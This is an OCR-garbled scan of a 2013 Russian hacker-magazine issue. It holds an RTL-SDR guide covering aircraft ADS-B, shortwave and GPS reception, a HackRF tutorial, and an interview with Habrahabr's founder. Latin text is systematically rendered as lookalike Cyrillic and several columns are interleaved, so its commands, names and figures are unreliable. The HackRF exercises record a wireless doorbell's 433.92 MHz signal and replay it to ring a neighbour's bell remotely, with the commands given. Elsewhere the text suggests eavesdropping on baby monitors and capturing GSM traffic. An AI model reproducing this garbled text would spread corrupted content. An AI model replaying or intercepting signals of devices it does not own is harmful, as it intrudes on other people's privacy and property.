чать галочку ЕШег Ацато. Если все идет по плану — в окне 0$0 
побегут декодированные пакеты, а в наушниках будут слышны 
переговоры. Эта схема также работает с упомянутым плагином 
АщоТипег в 5ОАЗВагр. Найти частоты предлагаю читателям са- 
мостоятельно, так как эта информация не является открытой. 


РАДИОПЕРЕГОВОРЫ САМОЛЕТОВ И ДИСПЕТЧЕРОВ 
По историческим причинам для радиосвязи в авиации исполь- 
зуется амплитудная модуляция. Обычно передачи с самолетов 
лучше слышно, чем от диспетчеров или погодных информаторов 
на земле. Диапазон частот — 117-130 МГц. 


ПРИЕМ СИГНАЛОВ САВТОМАТИЧЕСКИХ ПЕРЕДАТЧИ- 
КОВ САМОЛЕТОВ АО$-В 

АО$-В используется для того, чтобы и диспетчер, и пилот ви- 
дели воздушную обстановку. Каждый самолет регулярно пере- 
дает параметры полета на частоте 1090 МГц: название рейса, 


С Е 
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И 
5) :сомнг урсопчепег мин +7 а8т ГО Ромег 
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высота, скорость, азимут, текущие координаты (передаются 
не всегда). 

Эти данные можем принять и мы, чтобы лично наблюдать 
за полетами. Два популярных декодера АОЗ-В для ВТЕ2832 — 
АОЗВЯ ( )} и АТЕ1090. Я использовал АОЗВЯ. 
Перед запуском желательно настроиться на 1090 МГи 
в 5ОАЗпагр, посмотреть, есть ли сигнал и какая ошибка часто- 
ты из-за неточности кварцевого генератора. Эту ошибку необ- 
ходимо скомпенсировать в настройках Егощ-епа’а: Егедиепсу 
соггесйоп (ррт). Нужно помнить, что величина этой ошибки 
может изменяться вместе с температурой приемника. Найден- 
ную коррекцию нужно указать и в окне АБВЗВЯ# (предварительно 
закрыв 5ОАЗпПагр). 

Оптимальная антенна-монополь для 1090 МГу получается 
длиной всего 6,9 см. Так как сигнал очень слабый, тут очень же- 
лательно иметь дипольную антенну, установленную вертикаль- 
но с такой же длиной элементов. 

АОЗВ# декодирует пакеты и ждет подключений по сети 
от клиента, отображающего воздушную обстановку. В каче- 
стве такого клиента мы будем использовать аа$6ЗСОРЕ ( 


). 


Раз {Игоиди 


Ореспуей 
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37.5940° 


*70С3Е7ТЕЕОВ01ЕОООО00000000000; 
*7ЕС0000000000000000000000000; 
*798ЕЕОЗ? 45ЕЕШОЕО0000000000000; 
*01С0000000000000000000000000; 
*0200000000000000000000000000; 
*4000000000000000000000000000; 
*870004С4421Е1!1ВЕЕ547СЕО! 40814; 
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После запуска ааз6ЗСОРЕ необходимо открыть пункт 
меню О1Пег —› Ме\могк —> Ме\могк зачр, нажать внизу на кнопку 
ач$6#, убедиться, что указан адрес сервера 127.0.0.1. Затем 
на карте необходимо найти твое местоположение и выполнить 
команду Мамааноп —› За Весемег 1Шосайоп. Затем запустить 
подключение к АОЗВ#: Оег —> Мемогк -› НРАМ-ааза спет 
ас\е. 

Если все сделано правильно, то в течение нескольких ми- 
нут ты сможешь увидеть информацию о самолетах (если, ко- 
нечно, они пролетают рядом с тобой). В моем случае с антен- 
ной-монополем можно было принимать сигналы от самолетов 
на расстоянии примерно 25 км. Результат можно улучшить, 
взяв более качественную антенну (диполь и сложнее), добавив 
дополнительный усилитель на входе (желательно на СаА$), ис- 
пользуя тюнер на основе А820Т (на этой частоте он имеет бо- 
лее высокую чувствительность по сравнению с Е4000). 


ПРИЕМ ДЛИННО- И КОРОТКОВОЛНОВЫХ АНАЛОГО- 
ВЫХИЦИФРОВЫХ РАДИОСТАНЦИИ 

До прихода интернета КВ-радиостанции были одним из спо- 
собов узнавать новости с другого конца земного шара — ко- 
роткие волны, отражаясь от ионосферы, могут приниматься 
далеко за горизонтом. Большое количество КВ-радиостанций 
существует и поныне, их можно искать в диапазоне -8-15 МГц. 
Ночью в Москве мне удавалось услышать радиостанции 
из Франции, Италии, Германии, Болгарии, Великобритании 
и Китая. 

Дальнейшее развитие — цифровые ОАМ-радиостанции: 
на коротких волнах передается сжатый звук с коррекцией оши- 
бок + дополнительная информация. Слушать их можно с помо- 
щью декодера Огеат (Би.1у/186хОрР0). Диапазон частот для по- 
иска — от 0 до 15 МГц. Нужно помнить, что для таких низких 
частот может понадобиться большая антенна. 

Помимо этого, можно услышать передачи радиолюби- 
телей — на частотах 1810-2000 кГц, 3500-3800 кГц, 7000- 
7200 кГц, 144-146 МГц, 430-440 МГц и других. 


РАДИОСТАНЦИЯ «СУДНОГО ДНЯ, — ЦУВ-76 

И\В-76 расположена в западной части России, передает 
на частоте 4,625 МГц с начала 80-х годов и имеет не до конца 
ясное военное назначение. В эфире время от времени пере- 
даются кодовые сообщения голосом. Мне удалось принять ее 
на РТЕ2832 с конвертором и 25-метровую антенну, спущенную 
с балкона. 


СР$ 
Одна из самых необычных возможностей — прием навигаци- 
онных сигналов со спутников СР$ на Т\-тюнер. Для этого по- 
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надобится активная СР5$-антенна (с усилителем). Подключать 
антенну к тюнеру нужно через конденсатор, а до конденсатора 
(со стороны активной антенны) — батарейка на 3 В для питания 
усилителя в антенне. 

Далее можно либо обрабатывать слитый дамп эфира 
паНаб-скриптом (6И.1у/185хОБг) — это может быть интересно 
в целях изучения принципов работы СР$, — либо использовать 
@©№$$-5$0А (БИ./у/ЛаВУо$В), который реализует декодирова- 
ние сигналов СР$ в реальном времени. 

Принять аналогичным способом сигнал с ГЛОНАСС-спут- 
ников было бы затруднительно — там разные спутники пере- 
даютна разных частотах, и все частоты в полосу АТЁЕ2832 не по- 
мещаются. 


ДРУГИЕ ПРИМЕНЕНИЯ И ГРАНИЦЫ ВОЗМОЖНОГО 
ВТЕ2832 можно использовать для отладки радиопередатчиков, 
подслушивания за радионянями и аналоговыми радиотеле- 
фонами, для разбора протоколов связи в игрушках на радио- 
управлении, радиозвонках, пультах от машин, погодных стан- 
циях, системах удаленного сбора информации с датчиков, 
электросчетчиках. С конвертором можно считывать код с про- 
стейших 125 кГц ВЕЮ меток. Сигналы можно записывать дня- 
ми, анализировать и затем повторить в эфир на передающем 
оборудовании. При необходимости тюнер можно подключить 
к Апагоа-устройству, Вазрбеггу Р! или другому компактно- 
му компьютеру для организации автономного сбора данных 
из радиоэфира. 

Можно принимать фотографии с погодных спутников и слу- 
шать передачи с МКС — но тут уже потребуются специальные 
антенны, усилители. Фотографии декодируются программой 
Мо!тда (6К.1у/16К59СМ). 

Есть возможность захватывать зашифрованные данные, 
передаваемые С$ЗМ-телефонами (проект атробе — Би. 
[17а М), в случае если в сети отключен Тедиептсу-Порртод. 

Возможности ЗОВ на основе АТИ2832 все-таки не безгра- 
ничны: до М-Н и Вущоо{й он не достает по частоте, и, даже 
если сделать конвертер, из-за того, что полоса захватываемых 
частот не может быть шире -2,8 МГц, невозможно будет при- 
нимать даже один канал \ММ-Е!. Вищоот 1600 раз в секунду 
меняет рабочую частоту в диапазоне 2400-2483 МГу, и за ним 
будет не угнаться. По этой же причине невозможен полноцен- 
ный прием аналогового телевидения (там нужна принимаемая 
полоса 8 МГц, с 2,8 МП! можно получить только черно-белую 
картинку без звука). Для таких применений нужны более се- 
рьезные 5ОВ-приемники: НаскВЕ, МааеВЕ Ч$ЪВР1 и другие. 

Тем не менее возможность исследовать как аналоговый, 
так и цифровой радиоэфир, прикоснуться к спутникам и само- 
летам теперь есть у каждого! = 
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Итак, мы разобрались в самых азах $ОН, давай перейдем к более 
интересным вещам. С помощью НаскНЕ ты сможешь не только 
анализировать более широкий диапазон сигналов, но и взаимо- 
действовать с радиоустройствами. В общем, абсолютно полно- 
ценный 5ОВ-трансивер за вполне вменяемые деньги. 


ОТКУДАУНАСНАСКВЕ 

Так получилось, что после прошлогоднего ХегоМащ$ я посетил московский 
Наскзрасе Меигоп и ушел оттуда не с пустыми руками, а с кодом на бету 
НаскНЕ под честное слово, что девайс не будет пылиться на полке. Дальше 
было долгое ожидание старта бета-программы. И вот спустя без малого год 
обычной почтой прибыл долгожданный НаскВЕ уам/геакег. Большое спа- 
сибо Майклу Оссману (Мспае! О$зтапп) за разработанный девайс и Алек- 
сандру Чемерису из Гаимауе$ за предоставленную возможность поучаство- 
вать в программе бета-тестирования. Примечательно, что, судя по надписи 
на борту, плата была изготовлена в декабре 2012 года. 


ОБРЕЗАНИЕ 

Итак, посылка вскрыта, фото сделано, приступим к операции. НаскНЕ постав- 
ляется с плохонькой встроенной антенной на -900 МГц. При этом, несмотря 
на наличие уже распаянного ЭМА-разъема, просто подключить внешнюю 
антенну не получится, сигнал все равно будет браться с изогнутой дорожки 
с краю платы. 

Чтобы задействовать желанный антенный разъем, необходимо отклю- 
чить встроенную антенну. Для этого придется проделать неболышую хирур- 
гическую операцию, а именно разорвать одну токопроводящую дорожку. 
На плате место препарирования предусмотрительно отмечено стрелочкой, 
и на место будущего разрыва нанесена капля припоя, которую лучше прелд- 
варительно удалить паяльником. После этого, вооружившись чем-нибудь 
тонким и острым, нужно разрезать (разорвать) токопроводящую дорожку. 
Осторожно, поблизости расположено несколько элементов, которые с платы 
удалять нежелательно, так что будь аккуратен :). Перед тем как брать в руки 
скальпель, рекомендуем просмотреть инструкцию ( } 


СОФТ 

После успешного обрезания НаскНЕ готов к подключению внешней антенны. 
Форма, размеры и конструкция созданных впоследствии антенн чрезвычай- 
но разнообразны и зависят от рабочей длины волны и назначения антенны. 
Если под рукой не оказалось подходящей антенны с ЗМА-разъемом (как в на- 
шем случае), можно обойтись парой метров медного провода, извлеченного 
из сетевого кабеля пятой категории аКа «витая пара». Достаточно воткнуть 
один конец в центр антенного разъема на плате (не замкнув при этом на зем- 
лю), а второй подвесить, например, к люстре. Нам же для начала вполне по- 
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<<< \Месоте о СМИ Вад ю Сотрапюп 3.6.5 >>> 


дойдет кусок провода подлиннее, легко выдираемый из любого 
сетевого кабеля. Вставляем провод в ЭМА-разъем, подключа- 
ем НаскВЕ по УЗВ к компу, и можно приступать к установке/на- 
стройке софтовой части. 

Для экспериментов с радио вообще и НаскНЕ в частности 
пригодны Ипих и более-менее О$ Х. Про \\Мптаомз по боль- 
шей части можно забыть, так как под ней ничего, кроме 508А# 
и НОЗОВ, не работает. 

Самый простой путь получить весь нужный софт в работаю- 
щем виде — это воспользоваться уже готовым дистрибутивом 
ВТЕ-ЗОА/НаскНЕ Шуе О\О (6и.1у/15ВасЕ4). Также буквально во 
время написания этой статьи вышел Кай Ипих 1.05 с поддерж- 
кой ВТЁЕ-$ОРН. 

Для установки ЗОВ-утилит в Кай требуется выполнить сле- 
дующие команды: 


ар{-веф ирда*е 
ар*-веф а1$%-ирягаде 
ар{-ве{ 1п${фа11 Ка11-11пих-$аг 


Пользователи О$ Х могут найти готовые формулы 
для Нотебгеми (6 й.1у/15ВааИм) для большинства необходимого 
софта и собрать все ручками под себя. Однако без понимания 
и работы напильником не обойтись. 
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дящеев СМИ Вааю Для начала работы с НаскНЕ потребуется следующий софт: 


похоже на програм- . Паскг-00!$ — комплект утилит для работы с самим девай- 
мирование робота сом от производителя, 
Мтазюгтз$ ‚ ОзтоЗ0ОН — библиотека для работы с различными ЗОН; 


‚ СМУ Аадю — суперкомбайн для всего и вся, стандарт де- 
факто; 

. Оагх — анализатор спектра + просто радиоприемник на ос- 
нове 01 + СМУ Вад; 

. Банцате — отображение принятого сигнала. 


В только что распакованном девайсе, скорее всего, будет 
уже устаревшая прошивка, безнадежно отставшая от софта, 
предназначенного для работы с ним, что в итоге повлечет за со- 
бой массу проблем. Прокладываем себе путь, огибая грабли, 
и обновляем прошивку. Актуальную фирмварь всегда мож- 
но скачать из официального репозитория в виде сорцов (51. 
|у/15ВаоЦ3З) и собрать самостоятельно или же в бинарном виде 
(Б.1у/1 73 7еС). 

В итоге интересующий нас файл — ЯПитм/аге-ып/паск! и$б_ 
гот _1о_гат.бт. Берем его и прошиваем в недра уамогеакега: 


5аг:-> 0901$ Паскг+_5р1ЯазИ -м «= 
Паскг+_и$6_гот_фо_гат.61п 


После чего для проверки работоспособности НаскНР и кор- 
ректности подключения опросим устройство стандартной ути- 
литой из комплекта Паск\-{оо1[5: 


5аг:-> 0900$ Паскг+_1п+о 

Роипа НаскВЕ Боага. ОИ 
Воага ТО МитЬег: 1 (ЗамбгеаКег) 
Е1гимаге \ег$1оп: 2013.07.11 
РагЕ ТО Митбег: 90х6с664753 0х6с664753 
бег1а1 Митбег: 0х00000000 0х00000000 0х066062с8 + _ 
0х39196+87 


УПРАЖНЕНИЕ 1.БЫСТРЫЙ СТАРТ 

Долго думать над применением девайса не придется, эфир 
в наше время буквально кишит различной информацией. Про- 
стейший способ ее оттуда достать — упомянутый программный 
приемник дагх. А первым приходит в голову, что можно принять 
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Ваца!те выглядит, конечно, винтажненько Экран запуска дагх 

с помощью радио, как ни удивительно, — радио! Обычное ве- с кнопкой звонка и приемника с мерзким динамиком-пищал- 
щание твоей любимой радиостанции с использованием частот- кой. При нажатии кнопки звонка происходит передача данных 
ной модуляции (ЕМ). (уникальных для каждой пары приемник/передатчик) «в цифре» 

Запускаем дагх, выбираем НаскНЕ уаммогеакег в качестве на частоте 433,92 МГц, если верить инструкции. Наша задача — 
устройства, оставив остальные пункты по умолчанию. отснифать сигнал передатчика и научиться повторять, чтобы 

Остается только нажать на кнопку старта приема и лице- можно было звонить соседу в дверь удаленно. 
зреть визуализацию радиоэфира. Ползущая водопадом вниз Для начала определимся с частотой и проверим наличие 
спектрограмма наглядно дает понять, на каких частотах ведет- сигнала при помощи дагх. 
ся вещание, яркость полос соответствует интенсивности сиг- Как видно из картинки выше, при отправке сигнала четко за- 
нала. Далее устанавливаем нужную частоту, демодулятор типа метен небольшой «всплеск», оставляющий на спектрограмме 
\Мае ЕМ, и вуаля, из аудиовыхода уже слышны осмысленные ярко-красный след. Итак, данные передаются, теперь запишем 
звуки. их в файл командой 

Ура, у нас фм-тюнер за 300 баксов! Но это даже не верши- 
на айсберга возможностей, которые открываются перед нами, 211\е@711\е:-$ ПНаскг{_{гапзег -г Бе]111 -+ «= 
ведь можно не только принимать, но и передавать! Но счего на- 433000000 -Ь 1750000 -5 16000000 -а 1 
чать? 

Как ты помнишь, работает наша игрушка в На!-аирех ре- 

УПРАЖНЕНИЕ 2. НЮХАЕМ И ЗАПОМИНАЕМ Спектроанализатор жиме, так что флаг -г явно указывает, что же нужно делать, 
В качестве подопытного возьмем бытовой беспроводной зво- позволитвыявить а бе!1 — в нашем случае имя файла, куда в итоге попадет дамп 
нок. Данное устройство состоит из двух частей: передатчика нужный нам сигнал эфира. Ключом -{ задается частота в герцах, в этих же едини- 


цах указываются ширина записываемой полосы (-6) и частота 
дискретизации сигнала (-5). Ключ -а отвечает за использование 
БаидИпе <Е1> ЕЕТ=2048 затр(е_гаЁе=16000000 Н2=1Х ШтеБазе=1Х Бе1 встроенного усилителя. 

о. |409 [|400 |490 |4 |9 |949 | о |2 | | |0 |, [о М Запустив снифер, «звоним в звонок». Количество данных, 
получаемых из АЦП при сэмплировании на 16 МГц, достаточно 
велико, и лишние минуты работы снифера могут вылиться в ги- 
габайтные дампы, 99,9% которых — бесполезный шум, насле- 
дие бесконечного космоса. Сейчас же нас интересуют земные 
сигналы, а именно что же передала кнопка звонку. 

Лучший способ ознакомиться с полученной информаци- 
ей — использовать спектроанализатор. Тут нам на помощь 
придет старенькая, но до сих пор незаменимая программа 
рацате. Подгружаем наш файл в гам-режиме, вручную вы- 
ставляя параметры интерпретации (см. рисунок), иначе чуда 
не произойдет. 

Спектроанализатор визуализирует эфир наподобие того, 
что мы уже видели в дагх (точнее, все наоборот), но обладает 
богатым функционалом, позволяющим, в частности, нам скрол- 
лить и зуммить как захочется. Присмотревшись, среди шумов 
можно обнаружить явный сигнал. 

Что ж, раз сигнал есть, попробуем его воспроизвести 


в эфир. 


УПРАЖНЕНИЕ 3. СОБСТВЕННО РЕПЛЕЙ 
При помощи все той же утилиты Паскй 1гап$Рег производится 
и передача в эфир, по большому счету отличие лишь в флаге -1 
вместо -г, намекающем на ТХ. 


211\е@711\е:-$ Паскг+_фгапзФег -& Бе111 -+ \ 
433000000 -Б 1750000 -5$ 16000000 -а 1 


Просто, не правда ли? Слишком просто! Жаль, что на дан- 
ный момент Паск!{ {гапзТег опять поломали в части отправки. 
Поэтому для проигрывания записанного дампа будем исполь- 
зовать исключительный Инструмент с большой буквы И — @МУ 
Вааю. 


ХАКЕР 10 /177/2013 НаскНЕ: ключ на старт 


Сгх у2.1-9и-298-90е78 - Наскг#=О 
Ре Оаа \Мем Нар 
| 


о) м № Ы 


д З З . г. 0 0 0 0 0 МН? Е з ы Кесемег ОрНЧоп$ |3 
-800.000 кн? 


Нагд\муаге гед: 434.500000 МН; 


Рег | Могта( $ 

Моде |\\/1де РМ (${егео) $ 

АСС Газ+ $ 
№1 МВ2 


Бе -150 аВЕ$ 


1пры{ сопёго[$ | Весемег ОрНоп$ 


Ацдюо [ЖЕ] 


Слушаем частоту нашего звонка 


Для нашей цели источником сигнала будет файл дампа, 
который мы только что инспектировали при помощи БачцаЙпе. 
Для его подгрузки просто добавляем блок Ейе Зоигсе и в его 
свойствах указываем путь до файла. Следует обратить вни- 
мание на то, что каждая точка соединения имеет свой тип (на 
самом деле это тип данных РУПоп) и цвет. Наш первый блок 
будет отдавать данные типа ВУе, что, впрочем, неудивительно 
для ресурса-файла. 

Большинство блоков СМУ РаЧю заточены под обработку 
данных, представленных в векторном виде, поэтому прежде, 
чем что-либо делать дальше, требуется «приведение типов». 
Сделаем это преобразование в два шага: УСпаг-> Ноа\, Ноа{-> 
Сотр/ех, предварительно произведя деинтерливинг (расчле- 
нение потока на действительную и мнимую составляющие). Де- 
лается это не сложнее добавления источника — перетаскиваем 
нужные блоки и соединяем. 

Следующий блок в цепочке (Ааа Соп${) также требуется 


эоа Сагх 2.2 - ВаскЧ=0 


Ко) ва 25 [| 


1 0 3 .4 2 1 0 0 0 МН: оо Весемег ОрНоп5 
-262.200кн> 


Нагамуаге #гед: 103.683200 МНх 


Аиег — Могта! 
Моде —\М/де ЕМ (5{егео) [7 
АСС Раз и 


МВ1 МВ2 


$0 -104.7 аВЕ$ 


1приЕ соп!го|$ 


оо миииииини 


ИЯ 


у. 
О ИС 


И ОЫ 


О5Р 
ЕЕТ $ет9$ 


ие ира 


ТА ПЕ 


Получи ЕМ-тюнер за 300 долларов 


полях укажем не значения, а имена переменных. Так, при опре- 
делении свойств блоков в полях можно указывать не только 
константы, но и переменные и даже целые выражения, что, 
по сути, дает огромные возможности. 

Итак, преобразование данных описано, свойства блока вы- 
вода соответствуют исходным условиям, время запустить эту 
шарманку! По аналогии с ШЕ разработки, кликаем на кнопку 
компиляции, в результате получаем проект, собранный в виде 
РУпоп-скрипта, пригодного для запуска отдельно от дпигадю- 
сотрапюп. 


211\е@711\е:-$ ./фор_Ь1Тоск.ру 

11пих; СМУ С++ уег$1оп 4.6.3; Воо$*_ 104800; «+ 
ИНО _003.005.003-87-58+4000++ 

5г-о5то5аг \0.0.2-1-в2ЕРа266+4 (0.0.3211) «= 
5пигад1о 3.6.5 

Би11{-1п 51пК фурез$: ий ПаскЕее 


для приведения данных из нашего радио к виду, пригодному Также следует учесть, $115 ЗамбгеаКег м1 Ягтмаге 2013.07.1 

для дальнейшей работы, а именно для выравнивания сигнала что Баиа|пе имеет 15115 \о]К тасй1пе: аух_64_ттх_огс 

относительно нулевого уровня сложением с вектором-констан- дурное свойство падать 

той. Теперь наши данные выглядят и имеют формат по всем при открытии больших ...Пространство разрывает звук китайской псевдополифо- 

правилам СР, и можно отправить их прямо в блок вывода файлов, так что если нии. Так что теперь можно зазвонить соседей ровно до того 

(озтосот ЭК). ты пишешь длительный момента, пока они не вытащат батарейки из своего звонка. Ис- 
Озтосот Этк как раз реализует прослойку между СН по времени радиообмен, пользование направленной антенны приветствуется. 

и множеством различных ресиверов и трансмиттеров, то следует восполь- 

и НаскВЕ в их числе. ЗткК-блок для нашего случая облада- зоваться командой 94 ИТОГО 

ет практически теми же параметрами, что и Паск-{гапзти. и порезать полученный НаскАЕ отлично вписывается в нишу бюджетных приемопе- 

Для более удобного изменения частоты передачи и частоты файл на кусочки. Напри- редатчиков, да и само комьюнити $ЗОР бурлит и развивается, 

дискретизации в дальнейшем, создадим переменные (выта- мер, так: выходят дешевые гаджеты, пишется софт, жизнь удалась во 

щим из списка пару блоков УапаЫе), назовем их Неа и затр_ всех смыслах. Уже есть куча интересных проектов для работы 

ге и зададим соответствующие значения: 433 МГц и 16 МГц. 27Ие@7№е:-$ 94 Н=Ю0. со спутниками, АОЗ$-В, О$М, ЕТЕ, Вищоо\т и другими система- 

Ведь с какими параметрами записывали, с такими и надо от- 19 о=иттед.1а 6$=1М ми связи. Ну а то, чего еще не придумали, ты всегда можешь 

давать. При конфигурации блока вывода в соответствующих соип{=50 реализовать сам в СМУ Вааю. == 


[ЕКОМСНТЬ 2013 


Специально для тех, кто любит |0\/ 
|еме|, ПагОм/аге пПаскпоад и не стесняет- 
ся возиться с платами и сигналами, 
представляем уникальный для России 


проект Нага\маге \/Шаде. В рамках 
конференции ГегоМа1$ 2013 можно 
будет увидеть и попробовать разные 
способы и устройства для взлома 
встраиваемых систем и не только. Мы 
покажем как широко используемые 
НО-эмуляторы Тееп5у, так и наби- 


рающие популярность платформы РгохтагКкЗ 

зоИмиаге Оейпеа Вад. РарИ!Но ЕРСА 
Для участия в Нага\аге \/Шаде осо- Теепзу 

бых знаний и умений не требуется. ВазрЬегту Р! 

Все покажем на практике и объясним. 
В программе примут участие: Приносите свое железо с собой, 
НаскНВЕ давайте ломать вместе! 
ВааевВЕ При поддержке наших друзей 
Еаседапсег из Миапа (пиапа.соп) будет проведен 
Оле Ваепкгаке Пага\/аге-конкурс, наградой в котором 
ТАСЧМаюг станет МааеВЕ 5ЗОА 
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Вечный торт 
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ВЕЧНЫЙ 


ТОРТ 


Денис Крючков {=} Основатель Хабрахабра 


Есть минимум две причины, по которой гордая редакция твоей любимой 
«айти-мурзилки» решила пообщаться с создателем Хабрахабра об исто- 
рии этого уникального проекта. С одной стороны, конечно, это не имеющая 
прямых аналогов площадка, сформировавшая вокруг себя огромную ауди- 
торию П-профессионалов. А с другой — один из немногих успешных приме- 
ров того самого «издания нового поколения», которого все ждут с тех самых 
пор, как придумали слово «блог». Почему же гики смогли создать для себя 
медиа, которое не могут сделать обычные люди? 


Беседовал Степан Ильин 


[рии 


ВЕБПЛАНЕТА 

Никакого высшего образования у меня нет. Как и многие, 
после двух лет университета я понял, что это «не мое». Мне 
был и есть интересен интернет. Мне нравится делать интер- 
нет-продукты, копаться в устройстве сайтов и других подоб- 
ных вещах. Поэтому я все бросил и уехал в Москву, где стал 
набираться опыта в этой сфере. 

В 2001 годуя основал Вебпланету. На рынке было всего 
два издания о русском интернет-бизнесе. «Нетоскоп» — са- 
мый популярный и известный на тот момент проект. Еще был 
Интернет.ру, который находился в странном и непонятном со- 
стоянии. 

Мне было интересно следить за тем, как рос Яндекс, 
как падал РатЫег, как барахтался и пытался выжить Май. 
ги. Тогда Май.ги был двумя разрозненными компаниями: 
М@аВпасще и Роц.ги, которой принадлежал почтовый сервис. 

Я познакомился с известными людьми из интернет- 
компаний, набрался опыта и стал понимать, как все устроено 
в русском интернет-бизнесе. 

Хочешь быть объективным и писать обо всем? Будь 
готов к тому, что придется многое выворачивать наружу и 
не всем это понравится. Разумеется, такое далеко не всем 
нравится. Приходишь к людям и говоришь: «Купите у меня 
рекламу», а они отвечают: «Нет, мы не станем покупать у тебя 
рекламу, потому что ты написал вот об этом, а тебя просили 
этого не делать». Так я довел себя до ручки и продал проект, 
не успев из него даже уйти. 


Но Вебпланета стала моей школой жизни. Это полно- 
стью мой проект, который был сделан с нуля. Я сам делал 
дизайн, сам сверстал. Программисты только написали мне 
движок, чтобы я мог публиковать тексты не в ручном режиме. 

Классический контент-проект не масштабировался. 
Все было сильно завязано на человеческий фактор. А мне 
хотелось делать вещи, которые работали бы сами по себе. 
Чтобы ты спокойно занимался продуктом, а внутри него все 
бурлило и кипело. Поэтому я думал попробовать сделать про- 
ект, где репортером может выступать любой. 

Около полугода попанковал: заплел дреды, много 
гулял, фотографировал, читал, клубился... В общем, 
отдыхал и рефрешился после приобретения пятилетне- 
го опыта в интернет-журналистике. Переосмысливал все, 
что со мной произошло. И в моей голове начали вырисовы- 
ваться первые черты проекта с народной журналистикой. 
Схема будущего Хабрахабра. 


ХАБРАХАБР 

Паззл Хабра сложился из разных кусочков ЖЖ и Од. 
Нет редакции, но есть большая аудитория читателей, каж- 
дый из которых может быть репортером и источником ин- 
формации. В чем-то это похоже на ЖЖ. Там можно было, 
в той или иной мере, настроить свою ленту так, чтобы читать 
журналистов, получив для себя некое СМИ. Но там не было 
того, что я задумал, — возможности как-то оценивать людей, 
влиять на их карму и положение в этом сообществе. 
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Слово «Хабрахабр» ничего не значит, оно просто воз- 
никло у меня в голове. Сначала я даже придумал легенду, от- 
куда оно взялось, и в нее все поверили (см. прим. ред.). У меня 
сназваниями вообще как-то хорошо получается. «Автокадабру» 
тоже я изобрел, — думали, как назвать автосайт, и родилось та- 
кое название. 

Один программист написал мне на Реп первый движок. 
Но все перлисты медленные, и мы не сработались. И как-то 
раз ночью я написал Бобуку из Яндекса. Спросил, нет ли у него 
на примете хорошего, быстрого и способного разработчика. 
Он сказал, что такой есть — Сергей Коровкин, который сейчас 
делает Ргото 04. Мы встретились, и я быстро рассказал ему, 
что к чему. И буквально за какие-то две недели мы написали 
полностью новый движок на РНР. Это был самый настоящий 
марафон, полное безумие. Мы сидели круглыми сутками, я ри- 
совал макеты, что-то верстал и отдавал ему, а он все это «ожив- 
лял». Так что довольно быстро мы переписали на новом языке 
уже запущенный проект. 

Вначале Хабр был открытым. Более того — примерно 
полгода после старта он постоянно менялся и переделывался. 
До тех пор, пока я не почувствовал, что мы нашли тот самый ба- 
ланс необходимых компонентов, нужных, чтобы эта штука урав- 
новесила себя. 

Самая первая карма-война случилась между дорвей- 
щиками и яндексоидами всего лишь через полгода после 
запуска. На сайт пришло много яндексоидов, которым проект 
показался интересным, и там же оказались дорвейщики. И они 
стали минусовать всех яндексоидов. Те объединились и стали 
минусовать в ответ. Было интересно. 

Каждый раз после таких карма-войн мы настраивали 
механизм оценки кармы, чтобы все это уравновесить. Это 
похоже на то, как поисковики постоянно улучшают свои алго- 
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«Хабрахабр» ничего не значит, название просто 
возникло у меня в голове. Сначала я даже придумал 
легенду, откуда оно взялось, и в нее все поверили 
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СЕЙЧАС В ОФИ- 
СЕ КОМПАНИИ 
ТРУДЯТСЯ 20 
ЧЕЛОВЕК. И ЕЩЕ 
ПРИМЕРНО ДЕ- 
СЯТЬ РАБОТАЮТ 
УДАЛЕННО 


5 


Прим. ред.: популярных ле- 
генд было даже несколько. 
Вот, например: 1. Слово, 
всплывшее в случайно 
генерируемом приветствии 
пользователя на Ощу.ги. 

2. «Хабр» означает «волосы» 
на каком-то диковинном 
языке. Видимо, этаверсия 
вдохновлена логотипом. 
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ритмы. У нас было похоже, только мы, в отличие от поискови- 
ков, пытаемся ранжировать не сайты, а людей. 

Этот период молодости Хабрахабра был интересным, 
когда он еще не был стабилен и устойчив (и его без конца мота- 
ло туда-сюда). Сайт постоянно взламывали, на главной появля- 
лись Черные властелины и так далее. 

В какой-то момент вокруг проекта возник доволь- 
но большой хайп. Туда стали просачиваться люди, которые 
не были связаны с интернет-индустрией. Они просто слышали, 
что есть такой сайт, где все тусуются, и там происходит движу- 
ха. Как только таких людей стало много, мы решили, что пора 
закрывать регистрацию. Это была единственная возможность 
как-то их регулировать. Так сайт стал закрытым. 

Сначала мы просто закрыли регистрацию и выдали 
каждому по инвайту. Потом внедрили другие механизмы — 
к примеру, набираешь некое количество кармы и тебе дается 
еще инвайт. Написал топик, собравший определенный рей- 
тинг — еще один инвайт. Потом появилась песочница и воз- 
можность попасть на Хабр без инвайта. Мы предложили всем 
написать что-то в песочнице и показать, что ты обладаешь не- 
обходимыми знаниями, чтобы быть в сообществе. Сейчас это 
основной механизм проникновения людей на сайт. 

Был период, когда я устал от Хабра и даже на неко- 
торое время от него полностью отдалился. Но по возвра- 
щении я обнаружил совершенно другой сайт, не такой, каким 
я хотел его видеть. И мне пришлось года полтора приводить его 
в порядок. 

На сайте возникло очень много посторонних людей. 
Начался какой-то глупый троллинг. Кто-то вообще исполь- 
зовал Хабр как средство для получения трафика на свой сайт. 
Проект стал нестабильным. Сейчас часто просят «не раскачи- 
вать лодку», вот Хабр как раз был той самой качающейся лод- 
кой. Кто-то продолжал махать вес- 
лами, а кто-то падал — словом, был 
некий беспорядок. 

Я думал, Хабр будет регули- 
ровать сам себя и все будет хо- 
рошо. Но нет. Это не работает. Все 
равно должен быть человек, кото- 
рый смотрит за системой и поддер- 
живает ее в требуемом состоянии, 
когда нужно подкручивая гаечки 
и рычажки. 

Мне всегда хотелось, чтобы 
Хабр был хардкорным сайтом, 
интересным для программи- 
стов. Не хотелось, чтобы на сайте 
люди рассказывали о том, как по- 
красить стены в офисе (были такие 
посты) или как приготовить борщ. 
Но такие вещи все-таки стали по- 
являться, и меня это очень расстра- 
ивало. 

Полтора года я сидел и вычи- 
щал весь этот бардак, переводил 
в геаа опту людей, которые занима- 
лись какой-то фигней, наводил по- 
рядок. 

Тогда мне писали письма, 
угрожали, пытались взломать 
мою почту, писали всякую 
смешную фигню на Лурке про 
Хабр. В общем, несогласные пыта- 
лись меня троллить, ломать почту, 
спамить... ребята были веселые, 
и остановить их было тяжело. Но это 
продолжалось недолго. 

О0о$-атаки тоже были. 
В какой-то момент мы устали бо- 
роться и просто ушли под защиту 
Нотоаа Ёар. С тех пор нас больше 
не ОО)о$’ят. Бывает, конечно, про- 
буют и видят, что у нас есть зонтик. 

После всех этих атак мы 
перестроили полностью инфра- 
структуру, и теперь для нас за- 
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крыться от Обо$ — это просто ввести одну строку в кон- 
фиги. Но были периоды, когда нас ОВо$’или по два-три 
